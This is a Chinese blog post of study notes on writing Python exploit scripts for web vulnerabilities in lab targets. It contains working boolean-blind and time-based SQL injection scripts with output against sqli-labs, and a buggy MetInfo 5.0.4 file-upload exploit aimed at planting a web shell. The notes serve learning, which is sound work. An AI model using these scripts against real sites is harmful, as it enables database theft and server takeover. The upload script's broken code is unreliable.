[网络安全学习篇67]:python poc-exp

最新推荐文章于 2024-04-09 15:48:38 发布
最新推荐文章于 2024-04-09 15:48:38 发布
阅读量1.5k 收藏 17
点赞数 1
分类专栏: 渗透测试 千峰网络安全视频笔记篇 python 文章标签: 信息安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43252204/article/details/106131226
版权

引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!

 

往期博客:

第一阶段:

[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)

[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)

第二阶段:

[网络安全学习篇25]:初识Linux及简单命令

[网络安全学习篇32]:Linux脚本编写汇总及应用

第三阶段:

[网络安全学习篇33]:0基础带你入门python

[网络安全学习篇38]:基础环境搭建

[网络安全学习篇39]:HTML标签基础 常用的标签 表格

[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)

[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]:JS 基础 函数 事件

第四阶段:

[网络安全学习篇49]:渗透测试方法论

[网络安全学习篇50]:Web架构安全分析

[网络安全学习篇51]:信息收集

[网络安全学习篇52]:扫描技术

[网络安全学习篇53]:口令破解

[网络安全学习篇54]:SQL注入

[网络安全学习篇55]:SQL自动化注入

[网络安全学习篇56]:XSS

[网络安全学习篇57]:XSS(二)

[网络安全学习篇58]:PHP代码注入

[网络安全学习篇59]:OS命令注入

[网络安全学习篇60]:文件上传

[网络安全学习篇61]:文件包含

[网络安全学习篇62]:CSRF 攻击

[网络安全学习篇63]:SSRF

[网络安全学习篇64]:业务安全

[网络安全学习篇65]:提权

[网络安全学习篇66]:Metasploit(MSF)

[网络安全学习篇67]:python poc-exp(本篇)

下期博文:

[网络安全学习篇68]:反序列化漏洞

 

目录

python 编写EXP

requests模块

用pytho脚本实现布尔盲注

用python脚本实现延时注入

文件上传

python 编写EXP

exp 漏洞利用工具

以Web 漏洞为主

1、能够看懂别人写的exp,并修改

2、能自己写exp

基础环境 python3

核心模块 requests

requests模块

详细内容见我的博客:

[网络安全学习篇附]:python3-requests模块

定制头部

重新定义User-Agent 信息

超时

GET 传参

POST 传参

文件上传

cookie 信息

 

用pytho脚本实现布尔盲注

以sqli-labss-8为例,

import requests
import string

url = "http://192.168.1.200/sqli-labs/Less-8/"

normalHtmlLen = len(requests.get(url=url+"?id=1").text)

print("The len of HTML: "+str(normalHtmlLen))

dbNameLen =0

while True:
    dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    #print(dbNameLen_url)

    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbNameLen: "+str(dbNameLen))
        break

    if dbNameLen == 30:
        print("ERROR!")
        break

    dbNameLen +=1

dbName=""

for i in range(1,9):
    for a in string.ascii_lowercase:
        dbName_url = url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        #print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName +=a
            print("The dbName :"+dbName)
            break

------------

The len of HTML: 706

The len of dbNameLen: 8

The dbName :s

The dbName :se

The dbName :sec

The dbName :secu

The dbName :secur

The dbName :securi

The dbName :securit

The dbName :security

>>>

-----------

用python脚本实现延时注入

以sqli-labs-9为例,

import requests
import string

url = "http://192.168.1.200/sqli-labs/Less-9/"

def timeOut(url):
    try:
        res = requests.get(url,timeout=3)
        return res.text

    except Exception as e:
        return "timeout"

dbNameLen = 0

while True:
    dbNameLen +=1
    dbNameLen_url = url+"?id=1'+and+if(length(database())="+str(dbNameLen)+",sleep(5),1) --+"
    #print(dbNameLen_url)

    if "timeout" in timeOut(dbNameLen_url):
        print("The Len of dbName: "+str(dbNameLen))
        break;

    if dbNameLen == 30:
        print("ERROR!")
        break;

dbName = ""

for i in range(1,dbNameLen+1):
    for char in string.ascii_lowercase:
        dbName_url = url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+char+"',sleep(5),1)--+"
        #print(dbName_url)

        if "timeout" in timeOut(dbName_url):
            dbName +=char
            print("The dbName :"+dbName)
            break;

---------------

The Len of dbName: 8

The dbName :s

The dbName :se

The dbName :sec

The dbName :secu

The dbName :secur

The dbName :securi

The dbName :securit

The dbName :security

>>>

-----------------

 

文件上传

以Metinfov5.0.4为例,

import requests
import sys

url = sys.argv[1]

postUrl = urL+"http://192.168.1.200/metinfov504/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=123.com&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"

upFile = {"FileData":open(path,"rb")}

res = requests.post(url=postUrl,files=upFile)

print("The Shell path:"+url+res.text[4:])

参考文献:

千峰网络信息安全开源课程

beglage
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
sql注入pythonpoc_分享使用python编写poc,exp的实例教程
weixin_39592789的博客
12-17 475
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐没有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋poc,exp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
【总结】网安术语EXP、POC、Shellcode、Payload简单说明
最新发布
风舞雪凌月的博客
04-09 526
EXP(Exploit):漏洞利用,一般是完整的漏洞利用代码或程序POC(Proof of Concept):漏洞概念验证,一般用于证明漏洞存在,不具有攻击性Shellcode:获取shell的代码,获取shell是大部分攻击的最终目的Payload:攻击载荷,一系列具有完整框架性的攻击代码。
python traceback_干货分享丨Python从入门到编写POC之常用的标准库
weixin_39796149的博客
10-24 305
前期回顾>>Python介绍及安装使用Python从入门到编写POC之读写文件Python从入门到编写POC之特殊函数Python从入门到编写POC系列文章是i春秋论坛作家「Exp1ore」表哥原创的一套完整教程,想系统学习Python技能的小伙伴,不要错过哦!公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。常用的标准库安装完Python之后,我们也同时获得了...
Python之POC编写
qq_59923059的博客
08-15 1767
Python之POC编写入门
python 一个通用的POC模板
YouthBelief的博客
02-16 1249
0x00 前言 平时工作中 需要编写poc 而poc 大多步骤是重复的 比如用户输入 等 因此写一套模板 直接套用即可 0x01 模板编写 1.1 引入库 import sys import getopt import requests import threading import time import os import datetime import urllib3 from colorama import init, Fore # 修改命令行中颜色的库 #禁用https安全请求警告 以防
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
各种漏洞PoC、ExP的收集或编写 个人偶尔整理收集,仅为安全研究提供参考~ 请勿用于实施违法行为,如由您使用不当引起的法律⻛险,由您⾃主承担~ 一些POC来源
poc--exp:常用渗透poc收集
03-20
poc--exp 个人常用渗透poc收集 CVE-2014-4113 Win64bit本地提权漏洞 CVE-2014-4878海康RCE突破 CVE-2017-0143永恒之蓝突破 CVE-2017-0474安卓媒体服务器RCE CVE-2017-0641 Google Android Media框架远程代码执行...
Vulnerabilities:漏洞PoC和Exp收集; Vulnerabilities PoC & Exp collections
05-25
针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有带有后门的exp,请通过提交issue联系我。 Windows Microsoft Windows SMB远程代码执行漏洞(永恒之蓝) Microsoft IIS 6.0 远程...
catalog-poc-x21:目录poc-x21catalog-poc-x21v
03-18
“ catalog-poc-x21”自述文件 富 “ catalog-poc-x21catalog-poc-x21v” 酒吧
poc-swagger:[POC]昂首阔步
05-09
poc-swagger 这是一个Java 8项目。 运行:mvn spring-boot:run 访问Swagger-UI界面:
python爬虫_自动获取seebug的poc实例
09-21
下面小编就为大家带来一篇python爬虫_自动获取seebug的poc实例。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
python编写poc_学习Python到写poc其实没那么难
weixin_36084130的博客
01-14 623
现在,开始!0x00 前言今天刚刚把放到收藏夹准备看的,然后又看到题主的这个问题。顺便观摩了1楼大神的博客,我这种炒鸡新手表示很兴奋啊,阔以好好学习代码审计吖!但是萌妹子说了“不会开发的谈审计都是耍流氓!:)”。怎么办?? 我不会开发啊,我怎么学啊?????0x01 不会开发可以”抄”作为一个学渣,要考试的时候,总是把历年考题拿出来,别人题型怎么写的,你就怎么套,不用去管他原理。就好比别人都叫三楼...
python poc模板
m0_65109001的博客
04-03 240
自己写了一个漏扫模板,方便使用。
python实现定制EXP
weixin_51693574的博客
01-31 914
python实现定制EXP 一、POC和EXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
python编写简单poc,验证dvwa靶场
记录日常学习
09-02 373
python编写简单poc练习,熟悉poc基本构造,以dvwa为例。
Python Poco
vany_的博客
04-17 2514
异常处理 PocoTargetTimeout from poco.exceptions import PocoTargetTimeout try: .... except PocoTargetTimeout: # bugs here as the panel not shown raise PocoNoSuchNodeException from poco.ex...
python 到 poc
weixin_45694388的博客
10-10 464
0x01 特殊函数 0x02 模块 0x03 小工具开发记录 特殊函数 # -*- coding:utf-8 -*- #内容见POC.demo; POC.demo2 ; def add(x,y): a=x+y print(a) add(3,5) print('------------引入lambad版本:') add = lambda x,y : x+y print(add(3,5)) #lambda函数,在lambda函数后面直接加变量,变量后直接冒号,冒号后面是表达式,完美解
python之poc编写——sql篇
qq_51796436的博客
03-02 6509
sql注入漏洞漏扫单个网站基础sql扫描多个网站sql基础扫描 poc:即验证漏洞是否存在的脚本,也就是扫描器 兄弟们,开始写扫描器啦 sql注入漏洞漏扫 单个网站基础sql扫描 第一步,当然是写request函数啦。除了时间盲注外,1' and 1=2%23就能判断字符型的sql注入
Traceback (most recent call last): File "E:/Python-txt/CTF POC/测试.py", line 1, in <module> from seleniumwire import webdriver File "E:\Python-txt\venv\lib\site-packages\seleniumwire\webdriver.py", line 10, in <module> from selenium.webdriver import ActionChains # noqa File "E:\Python-txt\venv\lib\site-packages\selenium\webdriver\__init__.py", line 19, in <module> from .chrome.webdriver import WebDriver as Chrome # noqa File "E:\Python-txt\venv\lib\site-packages\selenium\webdriver\chrome\webdriver.py", line 18, in <module> from selenium.webdriver.chromium.webdriver import ChromiumDriver File "E:\Python-txt\venv\lib\site-packages\selenium\webdriver\chromium\webdriver.py", line 18, in <module> from selenium.webdriver.chromium.remote_connection import ChromiumRemoteConnection File "E:\Python-txt\venv\lib\site-packages\selenium\webdriver\chromium\remote_connection.py", line 19, in <module> from selenium.webdriver.remote.remote_connection import RemoteConnection File "E:\Python-txt\venv\lib\site-packages\selenium\webdriver\remote\remote_connection.py", line 31, in <module> from . import utils File "E:\Python-txt\venv\lib\site-packages\selenium\webdriver\remote\utils.py", line 18, in <module> import json File "E:\Python-txt\CTF POC\json.py", line 11, in <module> fileurl=sys.argv[1] IndexError: list index out of range 这是什么意思
07-15
这个错误提示表明在你的代码中发生了一个索引错误(IndexError)。具体来说,错误发生在你的代码中的`sys.argv[1]`这一行。 这个错误通常表示你正在尝试访问一个列表(`sys.argv`)的索引,但该索引超出了列表的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beglage

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值